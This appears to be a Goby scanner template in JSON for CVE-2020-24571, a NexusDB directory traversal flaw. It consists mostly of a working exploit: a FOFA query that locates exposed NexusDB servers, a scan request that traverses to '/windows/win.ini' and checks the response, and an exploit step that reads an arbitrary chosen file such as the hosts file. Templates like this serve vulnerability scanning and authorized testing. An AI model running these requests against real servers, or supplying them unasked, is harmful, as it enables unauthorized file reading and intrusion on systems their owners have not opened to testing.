Goby/json/NexusDB-path-traversal-(cve...

99 lines
2.4 KiB
JSON

{
"Name": "NexusDB path traversal (cve-2020-24571)",
"Description": "NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal.",
"Product": "NexusDB",
"Homepage": "https://www.nexusdb.com/support/index.php",
"DisclosureDate": "2020-08-21",
"Author": "itardc@163.com",
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/NexusDB/CVE-2020-24571/CVE-2020-24571.gif",
"FofaQuery": "header=\"Server: NexusDB\"",
"GobyQuery": "header=\"Server: NexusDB\"",
"Level": "2",
"Impact": "",
"Recommendation": "",
"References": [
"https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371",
"https://nvd.nist.gov/vuln/detail/CVE-2020-24571",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24571"
],
"HasExp": true,
"ExpParams": [
{
"name": "file",
"type": "createSelect",
"value": "/windows/win.ini,/Windows/System32/drivers/etc/hosts",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/../../../../../../../../windows/win.ini"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "application/octet-stream",
"variable": "$head"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "[extensions]",
"variable": "$body"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/../../../../../../../..{{{file}}}"
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": ["fileread"],
"CVEIDs": [
"CVE-2020-24571"
],
"CVSSScore": "7.5",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": ["NexusDB"],
"System": null,
"Hardware": null
},
"Disable": false
}